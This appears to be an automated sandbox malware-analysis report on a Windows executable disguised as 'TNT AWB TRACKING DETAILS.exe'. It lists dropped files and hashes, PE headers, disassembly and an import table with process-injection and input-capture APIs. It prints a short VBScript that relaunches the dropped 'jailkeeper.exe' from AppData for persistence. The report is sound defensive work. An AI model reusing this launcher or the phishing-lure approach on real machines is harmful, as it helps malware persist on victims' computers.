                                                  SSDEEP:6144:Vci2TrvdaTH0cdhd7TVlyEdJrbDrAt45wF5RM8BN5fNbQsdDStUS7334QhR:Vc9TrVaTHhZVlT3PAt45wF5qczNXFsTF
                                                  MD5:BE88657C1491A84DFEA7049F05A15806
                                                  SHA1:81D2BB07F0F0C7FD49EFD8784AF35AF2A36D2CA8
                                                  SHA-256:93C0836DDECDEE0A8BEC73E2447982554D37C5F722B1023AF524A354BD49DA1C
                                                  SHA-512:749C94EA2F68F616F168F03345B7C1949FA607B45596CB9542D136B2DB3A5348D13F1E2C07200E5D3A78BAA020C7BB799E12DED874B2DC15B6F36A6AED7F850E
                                                  Malicious:false
                                                  Reputation:low
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11098
                                                  Entropy (8bit):7.472131977432088
                                                  Encrypted:false
                                                  SSDEEP:192:abF9LyVGZZbUkfNh1NKaJXqat8k5LSL/BaAmVzzqOihRh1pUoGJD/OS:abF9OoZZbtca5qat8kpSFaPBa//NS
                                                  MD5:5281BA67B0385C8F3582BC8F5391AE1B
                                                  SHA1:2636EA41FC82DBE96A1D78F9C7214151F5DA0A2A
                                                  SHA-256:A7BA1FF3D22BA71F05C306231BF5F41386D08D8FC7F225CC15523E88F5A7FC1A
                                                  SHA-512:720D5F01FC839626FB3E8A5B04B195D549A2DF59E8888DF0CBAE6FF73C64B05AB2521C8C5E79993D2341CA6676F0D17554843CBE6B7C32A05B0E9A6AA907367E
                                                  Malicious:false
                                                  Reputation:low
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.995904256257025
                                                  Encrypted:true
                                                  SSDEEP:6144:Vci2TrvdaTH0cdhd7TVlyEdJrbDrAt45wF5RM8BN5fNbQsdDStUS7334QhR:Vc9TrVaTHhZVlT3PAt45wF5qczNXFsTF
                                                  MD5:BE88657C1491A84DFEA7049F05A15806
                                                  SHA1:81D2BB07F0F0C7FD49EFD8784AF35AF2A36D2CA8
                                                  SHA-256:93C0836DDECDEE0A8BEC73E2447982554D37C5F722B1023AF524A354BD49DA1C
                                                  SHA-512:749C94EA2F68F616F168F03345B7C1949FA607B45596CB9542D136B2DB3A5348D13F1E2C07200E5D3A78BAA020C7BB799E12DED874B2DC15B6F36A6AED7F850E
                                                  Malicious:false
                                                  Reputation:low
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11098
                                                  Entropy (8bit):7.472131977432088
                                                  Encrypted:false
                                                  SSDEEP:192:abF9LyVGZZbUkfNh1NKaJXqat8k5LSL/BaAmVzzqOihRh1pUoGJD/OS:abF9OoZZbtca5qat8kpSFaPBa//NS
                                                  MD5:5281BA67B0385C8F3582BC8F5391AE1B
                                                  SHA1:2636EA41FC82DBE96A1D78F9C7214151F5DA0A2A
                                                  SHA-256:A7BA1FF3D22BA71F05C306231BF5F41386D08D8FC7F225CC15523E88F5A7FC1A
                                                  SHA-512:720D5F01FC839626FB3E8A5B04B195D549A2DF59E8888DF0CBAE6FF73C64B05AB2521C8C5E79993D2341CA6676F0D17554843CBE6B7C32A05B0E9A6AA907367E
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.995904256257025
                                                  Encrypted:true
                                                  SSDEEP:6144:Vci2TrvdaTH0cdhd7TVlyEdJrbDrAt45wF5RM8BN5fNbQsdDStUS7334QhR:Vc9TrVaTHhZVlT3PAt45wF5qczNXFsTF
                                                  MD5:BE88657C1491A84DFEA7049F05A15806
                                                  SHA1:81D2BB07F0F0C7FD49EFD8784AF35AF2A36D2CA8
                                                  SHA-256:93C0836DDECDEE0A8BEC73E2447982554D37C5F722B1023AF524A354BD49DA1C
                                                  SHA-512:749C94EA2F68F616F168F03345B7C1949FA607B45596CB9542D136B2DB3A5348D13F1E2C07200E5D3A78BAA020C7BB799E12DED874B2DC15B6F36A6AED7F850E
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11098
                                                  Entropy (8bit):7.472131977432088
                                                  Encrypted:false
                                                  SSDEEP:192:abF9LyVGZZbUkfNh1NKaJXqat8k5LSL/BaAmVzzqOihRh1pUoGJD/OS:abF9OoZZbtca5qat8kpSFaPBa//NS
                                                  MD5:5281BA67B0385C8F3582BC8F5391AE1B
                                                  SHA1:2636EA41FC82DBE96A1D78F9C7214151F5DA0A2A
                                                  SHA-256:A7BA1FF3D22BA71F05C306231BF5F41386D08D8FC7F225CC15523E88F5A7FC1A
                                                  SHA-512:720D5F01FC839626FB3E8A5B04B195D549A2DF59E8888DF0CBAE6FF73C64B05AB2521C8C5E79993D2341CA6676F0D17554843CBE6B7C32A05B0E9A6AA907367E
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:ASCII text, with very long lines (29698), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):29698
                                                  Entropy (8bit):3.5475165415526244
                                                  Encrypted:false
                                                  SSDEEP:384:cdhx4G/5NHn3dncZugAgAhxT+NfidvT/gSvHD1n4861RvVItdps8MOoF1CFNjP1H:ZG/HH3d/p2KdvzgSfiVItdphKF4/1H
                                                  MD5:5D5AB430D2E0EEF55F075C7541D292FB
                                                  SHA1:1BBBED09FB08FD5447F968C9B90A992C281F5AB0
                                                  SHA-256:7BACF4A02DF8CD899DDF7A434AE60B9244766EC0FA2DE472F49C72F9F9B12AB4
                                                  SHA-512:2FCEF3319B5546B4E9B4B646583C9B0A666B084BC40A54B3E56E7E0424BD8C42AB9518956E8DCCE87F8B9B76EAD411E8510DAD51BA6AB794C4AC37FCA8B87D84
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.995904256257025
                                                  Encrypted:true
                                                  SSDEEP:6144:Vci2TrvdaTH0cdhd7TVlyEdJrbDrAt45wF5RM8BN5fNbQsdDStUS7334QhR:Vc9TrVaTHhZVlT3PAt45wF5qczNXFsTF
                                                  MD5:BE88657C1491A84DFEA7049F05A15806
                                                  SHA1:81D2BB07F0F0C7FD49EFD8784AF35AF2A36D2CA8
                                                  SHA-256:93C0836DDECDEE0A8BEC73E2447982554D37C5F722B1023AF524A354BD49DA1C
                                                  SHA-512:749C94EA2F68F616F168F03345B7C1949FA607B45596CB9542D136B2DB3A5348D13F1E2C07200E5D3A78BAA020C7BB799E12DED874B2DC15B6F36A6AED7F850E
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\mobsync.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1239949490932863
                                                  Encrypted:false
                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                  MD5:271D5F995996735B01672CF227C81C17
                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1169920
                                                  Entropy (8bit):7.148239420007654
                                                  Encrypted:false
                                                  SSDEEP:24576:2u6J33O0c+JY5UZ+XC0kGso6FaDKn/Jzznkc+zflnmgWY:Yu0c++OCvkGs9FaDW/JzTvQCY
                                                  MD5:C32B24D16816AF9ADDD23883F8B474BB
                                                  SHA1:17E0EF8034418EE6BF28E6436A95E5C16A4F2B2E
                                                  SHA-256:DE25835C72E839F3E2EF5636B3A144A584A4A5F9AEC9BFACF474A9740EA135DD
                                                  SHA-512:D611DDB8EB9366FEF7A347D1D5EA6DA5DF463F3AF867B20FF040B918CFD229C73EB5A8AF11E465B01FB9098972F07A041D90F6E6F12CB9E12349F29C4271D488
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):284
                                                  Entropy (8bit):3.3784972597051195
                                                  Encrypted:false
                                                  SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1KZyynriIM8lfQVn:DsO+vNlDQ1KXmA2n
                                                  MD5:5936A518D2C8F5581F03EBAED71EC707
                                                  SHA1:C11B74CFF08AB44AE294975F6E072C7B75C7E072
                                                  SHA-256:4F8F50193602C13A2CA1DA2BACADABC8BD9B8617477606E3CB1985ED2C19A35A
                                                  SHA-512:CA3D347A0CAF14CE3284310CA8452B6A2566243E0CC94CDB833F7F105758303CCEAF75FB7E34FDE4BA2758F416A6632D32A1C82D1F118F33EADDF2877FDE02B1
                                                  Malicious:true
                                                  Preview (UTF-16LE text, decoded):
                                                  Set WshShell = CreateObject("WScript.Shell")
                                                  WshShell.Run "C:\Users\engineer\AppData\Local\hurtling\jailkeeper.exe", 1
                                                  Set WshShell = Nothing
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.148239420007654
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:TNT AWB TRACKING DETAILS.exe
                                                  File size:1'169'920 bytes
                                                  MD5:c32b24d16816af9addd23883f8b474bb
                                                  SHA1:17e0ef8034418ee6bf28e6436a95e5c16a4f2b2e
                                                  SHA256:de25835c72e839f3e2ef5636b3a144a584a4a5f9aec9bfacf474a9740ea135dd
                                                  SHA512:d611ddb8eb9366fef7a347d1d5ea6da5df463f3af867b20ff040b918cfd229c73eb5a8af11e465b01fb9098972f07a041d90f6e6f12cb9e12349f29c4271d488
                                                  SSDEEP:24576:2u6J33O0c+JY5UZ+XC0kGso6FaDKn/Jzznkc+zflnmgWY:Yu0c++OCvkGs9FaDW/JzTvQCY
                                                  TLSH:9045CF2273DDC360CB669173BF69B7016EBF3C614630B85B2F980D7DA950162262D7A3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                  Icon Hash:aaf3e3e3938382a0
                                                  Entrypoint:0x427dcd
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x67610E04 [Tue Dec 17 05:37:08 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                  Instruction
                                                  call 00007F6F40B72A4Ah
                                                  jmp 00007F6F40B65814h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F6F40B6599Ah
                                                  cmp edi, eax
                                                  jc 00007F6F40B65CFEh
                                                  bt dword ptr [004C31FCh], 01h
                                                  jnc 00007F6F40B65999h
                                                  rep movsb
                                                  jmp 00007F6F40B65CACh
                                                  cmp ecx, 00000080h
                                                  jc 00007F6F40B65B64h
                                                  mov eax, edi
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007F6F40B659A0h
                                                  bt dword ptr [004BE324h], 01h
                                                  jc 00007F6F40B65E70h
                                                  bt dword ptr [004C31FCh], 00000000h
                                                  jnc 00007F6F40B65B3Dh
                                                  test edi, 00000003h
                                                  jne 00007F6F40B65B4Eh
                                                  test esi, 00000003h
                                                  jne 00007F6F40B65B2Dh
                                                  bt edi, 02h
                                                  jnc 00007F6F40B6599Fh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007F6F40B659A3h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007F6F40B659F5h
                                                  bt esi, 03h
                                                  jnc 00007F6F40B65A48h
                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2013 UPD4 build 31101
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD4 build 31101
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x551bc | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11d000 | 0x711c | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc | 0xc7000 | 0x551bc | 0x55200 | c8df9ddd37363ee83d1458ba72655d7f | False | 0.9232344438325991 | data | 7.882499569712898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0x11d000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                                  RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                                  RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                  RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                                  RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                                  RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                                  RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                                  RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                                  RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                                  RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                                  RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                                  RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
                                                  RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                  RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                                  RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                  RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                  RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                  RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                  RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                  RT_RCDATA | 0xcf7b8 | 0x4c484 | data | | | 1.0003392521091239
                                                  RT_GROUP_ICON | 0x11bc3c | 0x76 | data | English | Great Britain | 0.6610169491525424
                                                  RT_GROUP_ICON | 0x11bcb4 | 0x14 | data | English | Great Britain | 1.25
                                                  RT_GROUP_ICON | 0x11bcc8 | 0x14 | data | English | Great Britain | 1.15
                                                  RT_GROUP_ICON | 0x11bcdc | 0x14 | data | English | Great Britain | 1.25
                                                  RT_VERSION | 0x11bcf0 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                                  RT_MANIFEST | 0x11bdcc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                                  DLL | Import
                                                  WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                  VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                  WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                  MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                  WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                  PSAPI.DLL | GetProcessMemoryInfo
                                                  IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                  USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                  UxTheme.dll | IsThemeActive
                                                  KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                  USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                  GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                  COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                                                  ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                  SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
